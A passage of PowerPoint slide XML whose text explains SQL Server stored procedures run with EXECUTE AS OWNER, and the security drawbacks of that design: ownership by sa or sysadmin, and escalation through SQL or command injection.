            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Developers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> user, to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>able</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>kind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>elevated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>give</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>things</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>developers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> database (EXECUTE AS OWNER). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> place in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> limited and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>impersonate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>disadvantages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>perspective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>there</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>granular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>over</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>owner’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>deployed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>owns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> database. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> DB_OWNER role </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> EXECUTE AS OWNER to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Finally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>those</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>insecurely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>impersonation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>through</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>occur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>extending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</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3924971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9EF5-430B-DA49-8357-B37729368EDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
